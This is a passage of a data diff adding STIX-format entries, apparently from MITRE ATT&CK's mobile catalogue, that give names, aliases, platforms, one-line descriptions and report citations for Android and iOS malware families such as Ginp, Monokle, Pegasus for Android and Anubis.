{ + "source_name": "Tripwire-MazarBOT", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. 
Retrieved December 23, 2016.", + "url": "https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Ginp" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "type": "malware", + "created": "2020-04-08T15:51:24.862Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0423", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0423" + }, + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-09-11T15:50:18.707Z", + "name": "Ginp", + "description": "[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422).(Citation: ThreatFabric Ginp)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "HummingWhale", + "description": "[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. 
(Citation: ArsTechnica-HummingWhale)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f", + "created": "2017-10-25T14:48:40.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0321", + "external_id": "S0321" + }, + { + "source_name": "HummingWhale", + "description": "(Citation: ArsTechnica-HummingWhale)" + }, + { + "source_name": "ArsTechnica-HummingWhale", + "description": "Dan Goodin. (2017, January 23). Virulent Android malware returns, gets >2 million downloads on Google Play. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "eSurv" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "type": "malware", + "created": "2020-09-14T14:13:45.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0507", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0507" + }, + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-14T15:39:17.698Z", + "name": "eSurv", + "description": "[eSurv](https://attack.mitre.org/software/S0507) is mobile surveillanceware designed for the lawful intercept market that was developed over the course of many years.(Citation: Lookout eSurv)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-01T22:00:09.640Z", + "name": "TangleBot", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "TangleBot" + ], + "type": "malware", + "id": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "created": "2023-02-28T21:39:52.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1069", + "external_id": "S1069" + }, + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Jörg Abraham, EclecticIQ" + ], + "x_mitre_aliases": [ + "Monokle" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "type": "malware", + "created": "2019-09-04T14:28:14.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/software/S0407", + "source_name": "mitre-attack", + "external_id": "S0407" + }, + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2021-11-01T18:30:41.998Z", + "name": "Monokle", + "description": "[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. 
It is developed for Android, but there are some code artifacts that suggests an iOS version may be in development.(Citation: Lookout-Monokle)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Red Alert 2.0" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "type": "malware", + "created": "2020-12-14T14:52:02.949Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0539", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0539" + }, + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." 
+ } + ], + "modified": "2020-12-16T20:52:20.822Z", + "name": "Red Alert 2.0", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "ViceLeaker", + "Triout" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "type": "malware", + "created": "2019-11-21T16:42:48.203Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0418", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0418" + }, + { + "source_name": "ViceLeaker", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "source_name": "Triout", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." 
+ } + ], + "modified": "2020-03-26T19:00:42.233Z", + "name": "ViceLeaker", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Ofir Almkias, Cybereason" + ], + "x_mitre_aliases": [ + "FakeSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "type": "malware", + "created": "2020-09-15T15:18:11.971Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0509", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0509" + }, + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." 
+ } + ], + "modified": "2020-10-06T20:09:57.659Z", + "name": "FakeSpy", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SpyDealer", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "SpyDealer" + ], + "type": "malware", + "id": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0324", + "external_id": "S0324" + }, + { + "source_name": "SpyDealer", + "description": "(Citation: PaloAlto-SpyDealer)" + }, + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. 
Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Concipit1248", + "Corona Updates" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "type": "malware", + "created": "2020-04-24T15:12:10.817Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0426", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0426" + }, + { + "source_name": "Corona Updates", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-30T18:30:05.787Z", + "name": "Concipit1248", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). 
Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RuMMS", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) is an Android malware family. (Citation: FireEye-RuMMS)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "created": "2017-10-25T14:48:48.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0313", + "external_id": "S0313" + }, + { + "source_name": "RuMMS", + "description": "(Citation: FireEye-RuMMS)" + }, + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Pegasus for Android", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. 
(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Pegasus for Android", + "Chrysaor" + ], + "type": "malware", + "id": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "created": "2017-10-25T14:48:41.202Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0316", + "external_id": "S0316" + }, + { + "source_name": "Pegasus for Android", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Chrysaor", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + }, + { + "source_name": "Google-Chrysaor", + "description": "Rich Cannings et al.. (2017, April 3). An investigation of Chrysaor Malware on Android. 
Retrieved April 16, 2017.", + "url": "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "FrozenCell" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "type": "malware", + "created": "2021-02-17T20:43:52.033Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0577", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0577" + }, + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." 
+ } + ], + "modified": "2021-04-19T14:07:24.519Z", + "name": "FrozenCell", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "AndroidOS/MalLocker.B" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "type": "malware", + "created": "2020-10-29T18:41:49.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0524", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0524" + }, + { + "source_name": "Microsoft MalLockerB", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T18:41:49.272Z", + "name": "AndroidOS/MalLocker.B", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a screen containing a ransom note over all other windows. 
(Citation: Microsoft MalLockerB)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-02-28T21:05:57.018Z", + "name": "SharkBot", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "SharkBot" + ], + "type": "malware", + "id": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "created": "2023-01-18T19:44:52.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1055", + "external_id": "S1055" + }, + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RedDrop", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) is an Android malware family that exfiltrates sensitive data from devices. 
(Citation: Wandera-RedDrop)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "RedDrop" + ], + "type": "malware", + "id": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0326", + "external_id": "S0326" + }, + { + "source_name": "RedDrop", + "description": "(Citation: Wandera-RedDrop)" + }, + { + "source_name": "Wandera-RedDrop", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "url": "https://www.wandera.com/reddrop-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "CHEMISTGAMES" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "type": "malware", + "created": "2020-12-31T18:25:04.779Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0555", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0555" + }, + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." 
+ } + ], + "modified": "2021-03-25T16:42:05.526Z", + "name": "CHEMISTGAMES", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:19:15.826Z", + "name": "YiSpecter", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "YiSpecter" + ], + "type": "malware", + "id": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "created": "2017-10-25T14:48:48.301Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0311", + "external_id": "S0311" + }, + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. 
Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17", + "created": "2017-10-25T14:48:46.411Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0307", + "external_id": "S0307" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. 
Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Anubis" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "type": "malware", + "created": "2020-04-08T15:41:19.114Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0422", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0422" + }, + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2021-09-20T13:50:01.923Z", + "name": "Anubis", + "description": "[Anubis](https://attack.mitre.org/software/S0422) is Android malware that was originally used for cyber espionage, and has been retooled as a banking trojan.(Citation: Cofense Anubis)", + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "AndroRAT", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. 
